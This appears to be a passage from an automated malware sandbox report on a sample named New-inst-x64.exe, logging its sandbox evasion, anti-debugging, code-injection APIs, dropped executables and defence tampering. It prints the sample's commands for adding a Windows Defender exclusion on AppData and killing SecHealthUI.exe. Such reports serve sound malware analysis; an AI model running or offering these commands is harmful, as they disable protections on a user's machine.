      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Queries memory information (via WMI often done to detect virtual machines)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PortConnector
      Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3163Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 655Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5780Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3954Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6941
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2746
      Source: C:\Users\user\Desktop\New-inst-x64.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xctyuuxnvcrcuez.exeJump to dropped file
      Source: C:\Users\user\Desktop\New-inst-x64.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\mbtbiqwunmmmyby.exeJump to dropped file
      Source: C:\Users\user\Desktop\New-inst-x64.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ztrucvcctzwerxc.exeJump to dropped file
      Source: C:\Windows\System32\svchost.exe TID: 7944Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 3932Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep count: 3163 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep count: 655 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep time: -2767011611056431s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3580Thread sleep count: 5780 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3984Thread sleep count: 3954 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3432Thread sleep time: -11068046444225724s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7988Thread sleep count: 6941 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep time: -5534023222112862s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7988Thread sleep count: 2746 > 30
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0046FCDE FindFirstFileExW,28_2_0046FCDE
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0046FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_0046FD8F
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0046FCDE FindFirstFileExW,29_2_0046FCDE
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0046FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_0046FD8F
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0045DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0045DC9E
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_004861B4 mov edi, dword ptr fs:[00000030h]28_2_004861B4
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0046B71C GetProcessHeap,28_2_0046B71C
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0045D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0045D8E2
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0045DC92 SetUnhandledExceptionFilter,28_2_0045DC92
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0045DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0045DC9E
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_00465DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00465DCE
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0045D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_0045D8E2
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0045DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0045DC9E
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00465DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00465DCE

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Adds a directory exclusion to Windows Defender
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
      Contains functionality to inject code into remote processes
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_004861B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,28_2_004861B4
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""Jump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"Jump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"Jump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net sessionJump to behavior
      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 sessionJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exeJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
